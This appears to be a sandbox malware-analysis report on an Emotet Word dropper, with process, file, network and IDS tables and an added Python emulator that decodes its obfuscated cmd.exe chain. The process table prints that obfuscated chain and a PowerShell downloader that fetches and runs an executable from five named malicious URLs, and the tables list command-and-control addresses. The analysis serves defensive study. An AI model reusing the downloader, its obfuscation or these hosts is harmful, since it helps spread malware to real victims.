| Field | Value |
|---|---|
| File name | 549803480e0cbacb9b267a3f9935f05551d32a2fa5b647103094c8eaab265294 |
| Full analysis | https://app.any.run/tasks/db83b606-201a-4ce4-a84f-19cf6064d590 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | December 14, 2018, 09:12:27 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
| MD5 | 6E23FA3C2C3DC88CEA89F9330857D63E |
| SHA1 | 0CD7ED40F4806912C9CA8B5031DC268E48C2D7A4 |
| SHA256 | 549803480E0CBACB9B267A3F9935F05551D32A2FA5B647103094C8EAAB265294 |
| SSDEEP | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
Extension | File type | Score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Property | Value
---|---
Title | -
Subject | -
Author | -
Keywords | -
Comments | -
Template | Normal.dotm
LastModifiedBy | -
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2018:12:14 04:03:00
ModifyDate | 2018:12:14 04:03:00
Pages | 1
Words | 4
Characters | 26
Security | None
CodePage | Windows Latin 1 (Western European)
Company | -
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 29
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | -
CompObjUserTypeLen | 32
CompObjUserType | Microsoft Word 97-2003 Document
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\549803480e0cbacb9b267a3f9935f05551d32a2fa5b647103094c8eaab265294.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4088 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2648 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2816 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3220 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3496 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2612 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3492 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3360 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 |
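The command lines of PIDs 4088 and 2648 above are the same cmd.exe one-liner. It never names cmd or PowerShell literally and only reconstructs the PowerShell downloader (the command line of PID 2760) at run time, then feeds it on standard input to `PowerShell -` (PID 3496). The emulator below is an added example written for this page, not code from the ANY.RUN report or from the malware itself. The alphabet and index list are copied verbatim from the process table; the default `C:\ProgramData` path and the standard `assoc .psc1` output `.psc1=Microsoft.PowerShellConsole.1` are assumptions about the sandbox's Windows 7 install.

```python
r"""Emulator for the cmd.exe obfuscation layers seen in PIDs 4088/2648 above.

The one-liner abuses three cmd.exe features:
  1. %VAR:~start,len% substrings: %ProgramData:~0,1%%ProgramData:~9,2% spells
     "CmD" out of "C:\ProgramData", so "cmd" never appears literally;
  2. FOR /F "delims=.VXC46 tokens=2" ... IN ('assoc.psc1'): `assoc .psc1`
     prints ".psc1=Microsoft.PowerShellConsole.1"; token 2 after splitting on
     the delimiter characters is "PowerShell", avoiding that literal as well;
  3. a 76-character alphabet (AG) plus a list of indices: under delayed
     expansion each !AG:~%I,1! picks one character, !lQ6:~-421! keeps the
     last 421, and the result is echoed into PowerShell as a script.

ALPHABET and INDEX_LIST are verbatim from the report. ASSOC_PSC1 and the
ProgramData path are the Windows defaults (assumption, not from the report).
"""
import re

ALPHABET = "QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\\G{uj3gxfK$N0)=o:,Ik5"
INDEX_LIST = "65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85"
ASSOC_PSC1 = ".psc1=Microsoft.PowerShellConsole.1"  # default `assoc .psc1` output (assumption)
PROGRAM_DATA = r"C:\ProgramData"                    # default %ProgramData% (assumption)


def cmd_substring(value, start, length=None):
    """%VAR:~start,length% semantics: a negative start counts from the end, a
    negative length trims that many characters off the end, and a start past
    the end yields '' (the trailing index 85 relies on exactly that)."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    end = n + length if length < 0 else start + length
    return value[start:end]


def for_f_token(line, delims, token):
    """FOR /F "delims=<delims> tokens=<n>": split on any delimiter character,
    drop empty fields (cmd collapses runs of delimiters), 1-based selection."""
    fields = [f for f in re.split("[" + re.escape(delims) + "]", line) if f]
    return fields[token - 1] if 0 < token <= len(fields) else ""


def decode_index_stage(alphabet, index_csv, keep_last=421):
    """Rebuild the string the FOR loop accumulates into !lQ6! one character
    per index, then apply the final !lQ6:~-421! trim."""
    built = "".join(cmd_substring(alphabet, int(i), 1) for i in index_csv.split(","))
    return cmd_substring(built, -keep_last)


def spawned_binary():
    """What %ProgramData:~0,1%%ProgramData:~9,2% expands to."""
    return cmd_substring(PROGRAM_DATA, 0, 1) + cmd_substring(PROGRAM_DATA, 9, 2)


def extract_urls(script):
    """Pull the '@'-joined payload URL list out of the decoded PowerShell."""
    m = re.search(r"'(https?://[^']*)'\.Split\('@'\)", script)
    return m.group(1).split("@") if m else []


def extract_drop_path(script):
    """Resolve $KdS=$env:temp+'\\'+$cuk+'.exe' when $cuk is a string literal."""
    m = re.search(r"\$cuk\s*=\s*'([^']*)'", script)
    return "%TEMP%\\" + m.group(1) + ".exe" if m else ""


if __name__ == "__main__":
    script = decode_index_stage(ALPHABET, INDEX_LIST)
    print(spawned_binary(), for_f_token(ASSOC_PSC1, ".VXC46", 2))
    print(script)
    print(extract_urls(script))
    print(extract_drop_path(script))
```

Running it prints `CmD PowerShell`, the decoded downloader exactly as it appears in the PID 2760 command line, the five payload URLs and `%TEMP%\934.exe`. Two details worth noting against the report: the trailing index 85 is past the end of the 76-character alphabet and expands to nothing, which is what lets `if %I==85` serve as the loop's end marker without adding a character; and in the network table WebClient followed the 301 from `/w9` to `/w9/`, the 120 Kb executable passed the script's `length -ge 80000` gate (which exists to reject short error or sinkhole pages), `Invoke-Item` launched it as 934.exe and `break` ended the loop, which is why none of the other four URLs were ever contacted.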
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6BCA.tmp.cvr | — | — | —
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E1F4FFB.wmf | — | — | —
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF6B66C1.wmf | — | — | —
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2DJ3Y7JT0Q94B9KT7L03.temp | — | — | —
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | FFDDA778140572C37C6C1B9E1A88C58B | 478279FBD54E6D1EE6C21D74755708B0B3AD34CCC4069C872C81C9A3A4BF25D2
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | B101F37EA9381CFA34A9F979C13ABD5B | B82510E270480CBA5A000547AF125F034A78A013F6B18A1E63932D80FD7945FB
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50F811C0.wmf | wmf | B7DB5ABE717258093E64730332846469 | 1DAA9EC858F21746B1890CDD36132B80487090235D0758E2404C457ED6EF5F89
3492 | 934.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | 1DBF8DD1593C49989527543036A58CDE | C9BA0C6EA2D8B5B9DB22F090BC926D3F2D8FCEFDAB57D49353FE05579200C1BF
3496 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247c35.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3496 | powershell.exe | GET | 301 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 297 b | malicious |
3984 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3984 | archivesymbol.exe | GET | — | 189.154.39.153:443 | http://189.154.39.153:443/ | MX | — | — | malicious |
3984 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
3984 | archivesymbol.exe | GET | 200 | 86.98.66.88:990 | http://86.98.66.88:990/ | AE | binary | 132 b | suspicious |
3496 | powershell.exe | GET | 200 | 212.227.94.120:80 | http://cipriati.co.uk/w9/ | DE | executable | 120 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3496 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
3984 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
3984 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 189.154.39.153:443 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
3984 | archivesymbol.exe | 86.98.66.88:990 | — | Emirates Telecommunications Corporation | AE | suspicious |
Domain | IP | Reputation
---|---|---
cipriati.co.uk | | malicious
dns.msftncsi.com | | shared
PID | Process | Class | Message |
---|---|---|---|
3496 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3496 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3496 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3496 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3496 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3984 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
3984 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3984 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |